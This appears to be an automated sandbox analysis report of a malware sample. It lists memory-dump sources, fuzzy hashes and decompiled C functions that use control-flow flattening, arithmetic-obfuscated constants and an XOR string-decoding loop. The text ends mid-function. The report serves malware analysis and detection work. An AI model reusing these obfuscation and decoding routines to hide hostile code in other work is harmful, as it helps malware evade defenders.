                                                      0x0023e215
                                                      0x0023e21a
                                                      0x00000000
                                                      0x00000000
                                                      0x0023e1c1
                                                      0x0023e1c3
                                                      0x0023e1c7
                                                      0x0023e1c9
                                                      0x0023e227
                                                      0x00000000
                                                      0x0023e227
                                                      0x0023e1d0
                                                      0x0023e1d2
                                                      0x0023e20c
                                                      0x0023e20c
                                                      0x0023e20e
                                                      0x0023e210
                                                      0x00000000
                                                      0x00000000
                                                      0x0023e1d6
                                                      0x0023e1e0
                                                      0x0023e1e0
                                                      0x0023e1d8
                                                      0x0023e1d8
                                                      0x0023e1d8
                                                      0x0023e1f4
                                                      0x0023e1f9
                                                      0x0023e1fc
                                                      0x0023e1fe
                                                      0x00000000
                                                      0x0023e200
                                                      0x0023e200
                                                      0x0023e204
                                                      0x0023e207
                                                      0x0023e209
                                                      0x0023e209
                                                      0x00000000
                                                      0x0023e209
                                                      0x0023e1fe
                                                      0x0023e212
                                                      0x0023e212
                                                      0x0023e212
                                                      0x00000000
                                                      0x0023e215

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &L$;)m$TB7f
                                                      • API String ID: 0-1597752287
                                                      • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                                      • Instruction ID: fa31acec404a8216b554892dab6a4be05f361feabb4f6c10052834ab44828899
                                                      • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                                      • Instruction Fuzzy Hash: 3351A9B16183028FD718CF25C88592BBBE1FFD4358F104A1DF899962A0D774DA5ACF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E002461B8(void* __ecx) {
                                                      				signed int _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				void* _t64;
                                                      				void* _t68;
                                                      				void* _t69;
                                                      				signed int _t71;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				signed int* _t78;
                                                      
                                                      				_t78 =  &_v24;
                                                      				_v12 = 0x5dfc;
                                                      				_v12 = _v12 * 0x23;
                                                      				_t69 = __ecx;
                                                      				_v12 = _v12 << 7;
                                                      				_t75 = 0;
                                                      				_v12 = _v12 ^ 0x066cb215;
                                                      				_t76 = 0x1b4ca438;
                                                      				_v24 = 0xd6f7;
                                                      				_v24 = _v24 + 0xffffb773;
                                                      				_v24 = _v24 + 0xd9f1;
                                                      				_v24 = _v24 + 0xe528;
                                                      				_v24 = _v24 ^ 0x000200e6;
                                                      				_v16 = 0x64b4;
                                                      				_v16 = _v16 + 0xda3f;
                                                      				_v16 = _v16 >> 1;
                                                      				_v16 = _v16 >> 0xd;
                                                      				_v16 = _v16 ^ 0x0000725d;
                                                      				_v4 = 0xc8c2;
                                                      				_v4 = _v4 | 0x9945d150;
                                                      				_v4 = _v4 + 0x9caf;
                                                      				_v4 = _v4 ^ 0x99461e9f;
                                                      				_v20 = 0xe019;
                                                      				_t71 = 0x46;
                                                      				_v20 = _v20 / _t71;
                                                      				_v20 = _v20 >> 0xd;
                                                      				_v20 = _v20 >> 4;
                                                      				_v20 = _v20 ^ 0x00001f6d;
                                                      				_v8 = 0xf95b;
                                                      				_v8 = _v8 | 0x30645c78;
                                                      				_v8 = _v8 + 0xffff8663;
                                                      				_v8 = _v8 ^ 0x3064d0a8;
                                                      				do {
                                                      					while(_t76 != 0x108726d) {
                                                      						if(_t76 == 0x1b4ca438) {
                                                      							_t76 = 0x2a486598;
                                                      							continue;
                                                      						} else {
                                                      							if(_t76 == 0x2a486598) {
                                                      								_push(_t71);
                                                      								_t68 = E00247F1B();
                                                      								_t78 =  &(_t78[1]);
                                                      								_t76 = 0x108726d;
                                                      								_t75 = _t75 + _t68;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L7;
                                                      					}
                                                      					_t71 = _v16;
                                                      					_t64 = E0023D64E(_t71, _v4, _v20, _t69 + 4, _v8);
                                                      					_t78 =  &(_t78[3]);
                                                      					_t76 = 0xee7d46d;
                                                      					_t75 = _t75 + _t64;
                                                      					L7:
                                                      				} while (_t76 != 0xee7d46d);
                                                      				return _t75;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ($]r$x\d0
                                                      • API String ID: 0-3053701899
                                                      • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                                      • Instruction ID: 1f8fcba8fd69887f545519e7eeafc9dda70281feda856bf47d7bce851a08123e
                                                      • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                                      • Instruction Fuzzy Hash: FF3166B29083429FD348DE14D84941BBBE0BBD5718F004E5DF899A6265D3B9DE1C8B93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E00240B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				void* _t76;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t76);
                                                      				_v16 = 0x6860;
                                                      				_v16 = _v16 * 0x5b;
                                                      				_v16 = _v16 ^ 0xdc6b4abd;
                                                      				_v16 = _v16 ^ 0xdc4e778c;
                                                      				_v32 = 0xa230;
                                                      				_v32 = _v32 << 0xe;
                                                      				_v32 = _v32 ^ 0x288c6565;
                                                      				_v8 = 0xfe44;
                                                      				_v8 = _v8 | 0x4c3583fb;
                                                      				_v8 = _v8 + 0xfffff685;
                                                      				_v8 = _v8 ^ 0x61a5c761;
                                                      				_v8 = _v8 ^ 0x2d906c10;
                                                      				_v40 = 0xe5db;
                                                      				_v40 = _v40 | 0x9b65f6ba;
                                                      				_v40 = _v40 ^ 0x9b65d356;
                                                      				_v20 = 0x9adf;
                                                      				_v20 = _v20 + 0x49d9;
                                                      				_v20 = _v20 + 0xffff68ea;
                                                      				_v20 = _v20 ^ 0x00005968;
                                                      				_v36 = 0x94a7;
                                                      				_v36 = _v36 ^ 0xf3da6fb3;
                                                      				_v36 = _v36 ^ 0xf3dae7d2;
                                                      				_v28 = 0xd25a;
                                                      				_v28 = _v28 + 0x1e41;
                                                      				_v28 = _v28 | 0x2f85fa9d;
                                                      				_v28 = _v28 ^ 0x2f85d3ee;
                                                      				_v12 = 0x5326;
                                                      				_v12 = _v12 ^ 0x0ede0c0e;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 << 4;
                                                      				_v12 = _v12 ^ 0x01db8a0a;
                                                      				_v24 = 0x6b2;
                                                      				_v24 = _v24 << 4;
                                                      				_v24 = _v24 | 0x9aa17d8a;
                                                      				_t63 =  &_v24;
                                                      				_v24 = _v24 ^ 0x9aa13f42;
                                                      				_push(_v32);
                                                      				_t91 = E0024889D(0x24c0b0, _v16,  *_t63);
                                                      				E0023C680(__ecx, _v40, _v20, 0x24c0b0, _v36, _a12, _t79, _a4);
                                                      				return E00242025(_v28, _t91, _v12, _v24);
                                                      			}














                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &S$`h$hY
                                                      • API String ID: 0-860638928
                                                      • Opcode ID: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
                                                      • Instruction ID: 5ac32dac8230f610ca4569d4ea37be3fff7344e570bf05e8cdbe1767aafc7ffa
                                                      • Opcode Fuzzy Hash: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
                                                      • Instruction Fuzzy Hash: A3312FB1C00209EBDF49CFA1C94A8EEBFB5FF44314F208198E41276260D3B94A65CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E10007F07(struct _EXCEPTION_POINTERS* _a4) {
                                                      
                                                      				SetUnhandledExceptionFilter(0);
                                                      				return UnhandledExceptionFilter(_a4);
                                                      			}



                                                      0x10007f0c
                                                      0x10007f1c

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                                      • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                                      • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                                      • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00245A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				signed int _v576;
                                                      				signed int _v580;
                                                      				signed int _v584;
                                                      				signed int _v588;
                                                      				signed int _v592;
                                                      				signed int _v596;
                                                      				signed int _v600;
                                                      				void* __ecx;
                                                      				void* _t115;
                                                      				signed int _t129;
                                                      				void* _t136;
                                                      				void* _t156;
                                                      				signed int _t157;
                                                      				signed int _t158;
                                                      				signed int _t159;
                                                      				signed int* _t163;
                                                      
                                                      				_push(_a16);
                                                      				_t156 = __edx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0023602B(_t115);
                                                      				_v564 = 0x4767;
                                                      				_t163 =  &(( &_v600)[6]);
                                                      				_v564 = _v564 << 9;
                                                      				_v564 = _v564 ^ 0x008e895f;
                                                      				_t136 = 0x30c826c8;
                                                      				_v588 = 0x30cc;
                                                      				_v588 = _v588 + 0x4702;
                                                      				_t157 = 0x63;
                                                      				_v588 = _v588 / _t157;
                                                      				_v588 = _v588 + 0xb80e;
                                                      				_v588 = _v588 ^ 0x0000cf36;
                                                      				_v596 = 0xadf;
                                                      				_t158 = 0x66;
                                                      				_v596 = _v596 * 0x61;
                                                      				_v596 = _v596 / _t158;
                                                      				_t159 = 0x4c;
                                                      				_v596 = _v596 / _t159;
                                                      				_v596 = _v596 ^ 0x0000541c;
                                                      				_v592 = 0x64b0;
                                                      				_v592 = _v592 * 0x15;
                                                      				_v592 = _v592 + 0xa35f;
                                                      				_v592 = _v592 >> 0xe;
                                                      				_v592 = _v592 ^ 0x0000251e;
                                                      				_v600 = 0x3c82;
                                                      				_v600 = _v600 | 0xdba50be5;
                                                      				_v600 = _v600 ^ 0x0661176e;
                                                      				_v600 = _v600 + 0x2491;
                                                      				_v600 = _v600 ^ 0xddc40dba;
                                                      				_v572 = 0x6631;
                                                      				_v572 = _v572 + 0xffff287e;
                                                      				_v572 = _v572 + 0x2e34;
                                                      				_v572 = _v572 ^ 0xffff8a80;
                                                      				_v584 = 0x3cf9;
                                                      				_v584 = _v584 ^ 0x209cd78c;
                                                      				_v584 = _v584 ^ 0x88ea975c;
                                                      				_v584 = _v584 | 0x088f8ebb;
                                                      				_v584 = _v584 ^ 0xa8ffe4fe;
                                                      				_v560 = 0x5a99;
                                                      				_v560 = _v560 << 2;
                                                      				_v560 = _v560 ^ 0x0001627e;
                                                      				_v576 = 0xc549;
                                                      				_v576 = _v576 * 0x36;
                                                      				_v576 = _v576 + 0xffff72cb;
                                                      				_v576 = _v576 ^ 0x00296382;
                                                      				_v568 = 0xc477;
                                                      				_v568 = _v568 + 0xffff852d;
                                                      				_v568 = _v568 ^ 0x00000bf7;
                                                      				_t160 = _v568;
                                                      				_v580 = 0xe5ab;
                                                      				_v580 = _v580 + 0x26f9;
                                                      				_v580 = _v580 + 0xffffb6c9;
                                                      				_v580 = _v580 ^ 0x0000c36f;
                                                      				do {
                                                      					while(_t136 != 0x96b3cdc) {
                                                      						if(_t136 == 0xc60f3b0) {
                                                      							_t129 = E00249AC7(_v572, _v584,  &_v556, _v560, _t160);
                                                      							_t163 =  &(_t163[3]);
                                                      							L11:
                                                      							asm("sbb ecx, ecx");
                                                      							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
                                                      							continue;
                                                      						}
                                                      						if(_t136 == 0x1f7f9ad4) {
                                                      							_v556 = 0x22c;
                                                      							_t129 = E002376F7( &_v556, _v592, _v600, _t160);
                                                      							goto L11;
                                                      						}
                                                      						if(_t136 == 0x28d0c761) {
                                                      							return E00244F7D(_v576, _v568, _t160);
                                                      						}
                                                      						if(_t136 != 0x2dc3f3d6) {
                                                      							if(_t136 != 0x30c826c8) {
                                                      								goto L16;
                                                      							} else {
                                                      								_t136 = 0x2dc3f3d6;
                                                      								continue;
                                                      							}
                                                      							L19:
                                                      							return _t129;
                                                      						}
                                                      						_t129 = E00231C88(_t136, _t136, _v580);
                                                      						_t160 = _t129;
                                                      						_t163 =  &(_t163[3]);
                                                      						if(_t129 != 0xffffffff) {
                                                      							_t136 = 0x1f7f9ad4;
                                                      							continue;
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					_push(_t156);
                                                      					_push( &_v556);
                                                      					if(_a4() == 0) {
                                                      						_t136 = 0x28d0c761;
                                                      						goto L16;
                                                      					} else {
                                                      						_t136 = 0xc60f3b0;
                                                      						continue;
                                                      					}
                                                      					goto L19;
                                                      					L16:
                                                      				} while (_t136 != 0x22b9bf83);
                                                      				return _t129;
                                                      			}

























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: 4.$gG
                                                      • API String ID: 2962429428-791606841
                                                      • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                                      • Instruction ID: 2567a7ca370f60bf7d3cf6f8f31f70096e5dd35a82fc2131f573d0a2262356e1
                                                      • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                                      • Instruction Fuzzy Hash: FB61AA715287429BD768CF24C88981FBBE0FFC4718F100A1DF5C6962A1D7B98A59CB87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0023B112() {
                                                      				char _v520;
                                                      				signed int _v524;
                                                      				intOrPtr _v528;
                                                      				intOrPtr _v532;
                                                      				intOrPtr _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				char* _t91;
                                                      				void* _t94;
                                                      				intOrPtr _t97;
                                                      				signed int _t109;
                                                      				signed int _t110;
                                                      				short* _t113;
                                                      
                                                      				_v524 = _v524 & 0x00000000;
                                                      				_v536 = 0x15a9e0;
                                                      				_t94 = 0x2447ce85;
                                                      				_v532 = 0xcaf76;
                                                      				_v528 = 0x42cbc4;
                                                      				_v544 = 0x1d8c;
                                                      				_v544 = _v544 << 8;
                                                      				_v544 = _v544 ^ 0x001dbb75;
                                                      				_v564 = 0xb98d;
                                                      				_v564 = _v564 * 0x6d;
                                                      				_v564 = _v564 | 0xb6682b1a;
                                                      				_t109 = 0x16;
                                                      				_v564 = _v564 / _t109;
                                                      				_v564 = _v564 ^ 0x084aef85;
                                                      				_v568 = 0xa53e;
                                                      				_v568 = _v568 | 0x3e6d869d;
                                                      				_t110 = 0x46;
                                                      				_v568 = _v568 * 0x2b;
                                                      				_v568 = _v568 ^ 0x7c6b3e02;
                                                      				_v540 = 0x49b5;
                                                      				_v540 = _v540 + 0xbc03;
                                                      				_v540 = _v540 ^ 0x0001452b;
                                                      				_v556 = 0x9474;
                                                      				_v556 = _v556 << 0xb;
                                                      				_v556 = _v556 ^ 0xd8ad9d33;
                                                      				_v556 = _v556 ^ 0xdc0e2a5f;
                                                      				_v560 = 0x11f0;
                                                      				_v560 = _v560 + 0xffffe240;
                                                      				_v560 = _v560 + 0xb761;
                                                      				_v560 = _v560 ^ 0x000087cb;
                                                      				_v548 = 0x2457;
                                                      				_v548 = _v548 / _t110;
                                                      				_v548 = _v548 ^ 0x000075df;
                                                      				do {
                                                      					while(_t94 != 0x14e9f4e4) {
                                                      						if(_t94 == 0x21e9d2a8) {
                                                      							_t97 =  *0x24ca2c; // 0x698300
                                                      							_t82 = _t97 + 0x230; // 0x7a0043
                                                      							return E00236636(_t82, _v556, _v560, _v548, _t113);
                                                      						}
                                                      						if(_t94 == 0x2275b3e1) {
                                                      							_t91 = E00243E3F(_t94,  &_v520, __eflags, _v544, _v564);
                                                      							_t94 = 0x14e9f4e4;
                                                      							continue;
                                                      						}
                                                      						if(_t94 != 0x2447ce85) {
                                                      							goto L15;
                                                      						}
                                                      						_t94 = 0x2275b3e1;
                                                      					}
                                                      					_v552 = 0xe342;
                                                      					_v552 = _v552 ^ 0x7b193e87;
                                                      					_v552 = _v552 ^ 0x7b19ddc7;
                                                      					_t113 =  &_v520 + E00240ADC( &_v520, _v568, _v540) * 2;
                                                      					while(1) {
                                                      						_t91 =  &_v520;
                                                      						__eflags = _t113 - _t91;
                                                      						if(_t113 <= _t91) {
                                                      							break;
                                                      						}
                                                      						__eflags =  *_t113 - 0x5c;
                                                      						if( *_t113 != 0x5c) {
                                                      							L10:
                                                      							_t113 = _t113 - 2;
                                                      							__eflags = _t113;
                                                      							continue;
                                                      						}
                                                      						_t76 =  &_v552;
                                                      						 *_t76 = _v552 - 1;
                                                      						__eflags =  *_t76;
                                                      						if( *_t76 == 0) {
                                                      							__eflags = _t113;
                                                      							L14:
                                                      							_t94 = 0x21e9d2a8;
                                                      							goto L15;
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      					goto L14;
                                                      					L15:
                                                      					__eflags = _t94 - 0x318d27d3;
                                                      				} while (__eflags != 0);
                                                      				return _t91;
                                                      			}























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: B$W$
                                                      • API String ID: 0-584637061
                                                      • Opcode ID: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
                                                      • Instruction ID: e410bbd594e1358f32ae0a9c584c8ee4201e8a34bbb7f8da3b5803138acb5f51
                                                      • Opcode Fuzzy Hash: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
                                                      • Instruction Fuzzy Hash: A24187B15183028BD715CF20D58955FBBE1FBC8758F104A1EF589662A0D7B48A5A8F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E002431E2(void* __eflags) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				char _v52;
                                                      				char _v572;
                                                      				intOrPtr* _t106;
                                                      				signed int _t110;
                                                      				signed int _t111;
                                                      
                                                      				_v52 = 0;
                                                      				_v28 = 0x38ff;
                                                      				_v28 = _v28 | 0x657975a1;
                                                      				_v28 = _v28 ^ 0x65795a60;
                                                      				_v36 = 0xb7c2;
                                                      				_t110 = 0x62;
                                                      				_v36 = _v36 / _t110;
                                                      				_v36 = _v36 ^ 0x0000110e;
                                                      				_v24 = 0xe00a;
                                                      				_v24 = _v24 << 5;
                                                      				_v24 = _v24 + 0xffffb393;
                                                      				_v24 = _v24 ^ 0x001b9d0d;
                                                      				_v20 = 0xfb31;
                                                      				_v20 = _v20 + 0xbdbd;
                                                      				_v20 = _v20 + 0x1446;
                                                      				_v20 = _v20 ^ 0x0001be9a;
                                                      				_v40 = 0x7fef;
                                                      				_v40 = _v40 >> 1;
                                                      				_v40 = _v40 ^ 0x00001ed5;
                                                      				_v8 = 0xf1c1;
                                                      				_v8 = _v8 << 7;
                                                      				_v8 = _v8 + 0x6d97;
                                                      				_v8 = _v8 << 9;
                                                      				_v8 = _v8 ^ 0xf29c2a73;
                                                      				_v32 = 0xb6f2;
                                                      				_v32 = _v32 | 0x667f3c4f;
                                                      				_v32 = _v32 ^ 0x667f909f;
                                                      				_v16 = 0xa641;
                                                      				_t111 = 0x3c;
                                                      				_v16 = _v16 / _t111;
                                                      				_v16 = _v16 >> 7;
                                                      				_v16 = _v16 ^ 0x1e480640;
                                                      				_v16 = _v16 ^ 0x1e480386;
                                                      				_v44 = 0xa73d;
                                                      				_v44 = _v44 >> 0xd;
                                                      				_v44 = _v44 ^ 0x000057d1;
                                                      				_v48 = 0x6a4b;
                                                      				_v48 = _v48 << 7;
                                                      				_v48 = _v48 ^ 0x00354ae8;
                                                      				_v12 = 0x27be;
                                                      				_v12 = _v12 ^ 0xc55dd82d;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0xb51d94d3;
                                                      				_v12 = _v12 ^ 0x844acffa;
                                                      				_t112 = _v28;
                                                      				if(E00231210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
                                                      					_t106 =  &_v572;
                                                      					if(_v572 != 0) {
                                                      						while( *_t106 != 0x5c) {
                                                      							_t106 = _t106 + 2;
                                                      							if( *_t106 != 0) {
                                                      								continue;
                                                      							} else {
                                                      							}
                                                      							goto L6;
                                                      						}
                                                      						_t112 = 0;
                                                      						 *((short*)(_t106 + 2)) = 0;
                                                      					}
                                                      					L6:
                                                      					E0024375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
                                                      				}
                                                      				return _v52;
                                                      			}




















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `Zye$J5
                                                      • API String ID: 0-1569392922
                                                      • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                                      • Instruction ID: 1c9c15c1694841710717b12a542b142c33d6dd68a98c02e9d6c7df59e5c885fe
                                                      • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                                      • Instruction Fuzzy Hash: 274113B1C1021DEBEF59CFA1C94A9EEBBB5FB14304F108199E111B62A0D7B94B54CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0024889D(signed int* __ecx, void* __edx, void* __eflags) {
                                                      				void* _t50;
                                                      				signed int _t57;
                                                      				signed int _t74;
                                                      				signed int _t75;
                                                      				signed int _t84;
                                                      				unsigned int _t85;
                                                      				unsigned int _t86;
                                                      				signed int _t93;
                                                      				signed int _t94;
                                                      				signed int* _t95;
                                                      				signed int* _t96;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				unsigned int _t100;
                                                      				void* _t106;
                                                      				short _t107;
                                                      				void* _t108;
                                                      				void* _t109;
                                                      
                                                      				_push( *((intOrPtr*)(_t108 + 0x30)));
                                                      				_push(__ecx);
                                                      				E0023602B(_t50);
                                                      				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
                                                      				_t95 =  &(__ecx[1]);
                                                      				_t107 = 0;
                                                      				 *((intOrPtr*)(_t108 + 0x34)) = 0;
                                                      				 *(_t108 + 0x24) = 0xc5f8;
                                                      				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
                                                      				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
                                                      				 *(_t108 + 0x1c) = 0x21c8;
                                                      				_t97 = 0x48;
                                                      				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
                                                      				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
                                                      				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
                                                      				 *(_t108 + 0x20) = 0xf93e;
                                                      				_t98 = 0xe;
                                                      				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
                                                      				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
                                                      				_t93 =  *__ecx;
                                                      				_t96 =  &(_t95[1]);
                                                      				_t57 =  *_t95 ^ _t93;
                                                      				 *(_t108 + 0x28) = _t93;
                                                      				 *(_t108 + 0x2c) = _t57;
                                                      				_t32 = _t57 + 1; // 0xf93f
                                                      				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
                                                      				_t109 = _t108 + 4;
                                                      				_t74 = E00238736(_t100 + _t100);
                                                      				 *(_t109 + 0x20) = _t74;
                                                      				if(_t74 != 0) {
                                                      					_t94 = _t74;
                                                      					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
                                                      					if(_t106 != 0) {
                                                      						_t75 =  *(_t109 + 0x1c);
                                                      						do {
                                                      							_t84 =  *_t96;
                                                      							_t96 =  &(_t96[1]);
                                                      							_t85 = _t84 ^ _t75;
                                                      							 *_t94 = _t85 & 0x000000ff;
                                                      							_t94 = _t94 + 8;
                                                      							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
                                                      							_t86 = _t85 >> 0x10;
                                                      							_t107 = _t107 + 1;
                                                      							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
                                                      							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
                                                      						} while (_t107 < _t106);
                                                      						_t74 =  *(_t109 + 0x18);
                                                      					}
                                                      					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
                                                      				}
                                                      				return _t74;
                                                      			}






















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q`${K
                                                      • API String ID: 0-3942002812
                                                      • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                                      • Instruction ID: 22778ad60c91bb4fa69981675429a4a7ee11a7771355100465bfc311c33e4ae7
                                                      • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                                      • Instruction Fuzzy Hash: AF31BB72A187128FD314DF29C48446BF7E0FF88318F414A2DE489A7250DB74E90A8B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0024878F(void* __ecx, void* __edx, void* __eflags) {
                                                      				signed int* _t40;
                                                      				signed int _t42;
                                                      				unsigned int* _t55;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t65;
                                                      				unsigned int _t66;
